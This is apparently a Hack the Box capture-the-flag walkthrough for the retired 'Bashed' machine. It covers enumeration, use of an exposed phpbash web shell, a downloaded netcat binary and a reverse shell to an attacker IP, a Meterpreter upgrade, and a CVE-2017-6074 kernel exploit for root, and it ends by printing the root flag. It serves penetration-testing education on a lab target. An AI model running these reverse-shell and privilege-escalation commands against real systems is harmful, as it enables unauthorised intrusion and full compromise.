Bashed, Hack the Box CTF Walkthrough
Overview
Bashed is a boot to root CTF from the Hack the Box archives. This was one of my favorite retired HTB challenges so far. The challenge involves initial compromise using a developer’s misconfigured server and requires significant more work to escalate privileges to root. This challenge forced me to think outside the box for managing shells and was overall a good CTF.
Enumeration
First, I conducted a basic nmap scan to enumerate open ports and services running on the target machine. The scan revealed an apache webserver was running on port 80.
┌──(kali㉿kali)-[~/Documents/htb/bashed]
└─$ nmap -sV --top-ports 200 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 09:06 EST
Nmap scan report for 10.10.10.68
Host is up (0.035s latency).
Not shown: 199 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds
Web Application Testing
Nexct, I launched BurpSuite and a firefox browser to being inspecting the target’s web application. In the background, I started dirb
a directory brute forcing tool. The resulting dirb scan revealed a directory called dev
.
┌──(kali㉿kali)-[~/Documents/htb/bashed]
└─$ dirb http://10.10.10.68
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Mar 5 09:10:15 2021
URL_BASE: http://10.10.10.68/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.68/ ----
==> DIRECTORY: http://10.10.10.68/css/
==> DIRECTORY: http://10.10.10.68/dev/
==> DIRECTORY: http://10.10.10.68/fonts/
==> DIRECTORY: http://10.10.10.68/images/
+ http://10.10.10.68/index.html (CODE:200|SIZE:7743)
==> DIRECTORY: http://10.10.10.68/js/
==> DIRECTORY: http://10.10.10.68/php/
+ http://10.10.10.68/server-status (CODE:403|SIZE:299)
==> DIRECTORY: http://10.10.10.68/uploads/
Exploit Developer Tools
After reading the index page of the website, I understood the server was also being used to develop the tool php bash. Browsing the /dev path shows that indeed, a working version of phpbash is running on the target server. The program allows a user to interact with a bash like terminal through the browser itself. I used this terminal to find the user flag, which was located at /home/arrexel
.
Privilege Escalation
To start the privilege escalation process, I wanted to upgrade my shell from the phpBash shell to a meterpreter one. Unfortunately, when trying to send a reverse shell to my attacker machine with netcat
, an error message occured stating that the -e option was not available. This was because the installed version of netcat was the BSD flavor (netcat-openBSD), only the traditional netcat (netcat-traditional) supports the -e option which is required to send a reverse shell. To get around this, I found a linux binary versionof the traditional netcat. After downloading the binary, I put in the /var/www/html
directory to serve with the apache webserver, then used wget
to download the file to the target machine through the dev phpBash terminal.
www-data@bashed:/var/www/html/uploads# wget 10.10.14.13/ncat-d
Next, I started a listener on my attack machine with the multi/handler on metasploit to catch the reverse shell.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.13:4444
Once the handler was started, I used the the phpBash sell to issue a reverse shell through the uploaded ncat binary.
www-data@bashed:./ncat-d 10.10.14.13 4444 -e /bin/bash
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.13:4444
[*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.68:48554) at 2021-03-05 18:34:33 -0500
Upgrading to Meterpreter Shell
Once I recieved the reverse shell, I background it with the cntl-z option. To upgrade this basic shell to a meterpreter one, I used the multi/manage/shell_to_meterpreter
module. After configuring the necessary options, I executed the module and started the meterpreter session.
msf6 post(multi/manage/shell_to_meterpreter) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.14.13:4433
[*] Sending stage (980808 bytes) to 10.10.10.68
[*] Meterpreter session 2 opened (10.10.14.13:4433 -> 10.10.10.68:42086) at 2021-03-05 18:38:50 -0500
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
Privilege Escalation via CVE-2017-6074
The last stage to escalate privileges was to find a public exploit that would work against the linux kernel. Some online research revealed that the Ubuntu 16.04 (Linux 4.4.0-62-generic) kernel being used by the target could be vulnerable to. CVE-2017-6074. I downloaded a proof of concept from exploi-db. Using GCC
, I compiled the exploit, then uploaded it to the target using the upload
meterpreter command back in the metepreter session.
meterpreter > upload /home/kali/Documents/htb/bashed/CVE-2017-6074
[*] uploading : /home/kali/Documents/htb/bashed/CVE-2017-6074 -> CVE-2017-6074
[*] Uploaded -1.00 B of 23.19 KiB (-0.0%): /home/kali/Documents/htb/bashed/CVE-2017-6074 -> CVE-2017-6074
[*] uploaded : /home/kali/Documents/htb/bashed/CVE-2017-6074 -> CVE-2017-6074
meterpreter > chmod 777 CVE-2017-6074
meterpreter > shell
Process 819 created.
Channel 2 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bashed:~/html/uploads$
www-data@bashed:~/html/uploads$ whoami
whoami
www-data
www-data@bashed:~/html/uploads$ ./CVE-2017-6074
./CVE-2017-6074
[.] namespace sandbox setup successfully
[.] disabling SMEP & SMAP
[.] scheduling 0xffffffff81064550(0x406e0)
[.] waiting for the timer to execute
[.] done
[.] SMEP & SMAP should be off now
[.] getting root
[.] executing 0x564e7dc912aa
[.] done
[.] should be root now
[.] checking if we got root
[+] got r00t ^_^
[!] don't kill the exploit binary, the kernel will crash
root@bashed:/var/www/html/uploads# whoami
whoami
root
root@bashed:/var/www/html/uploads# cat /root/root.txt
cat /root/root.txt
cc4f0afe3a1026d402ba10329674a8e2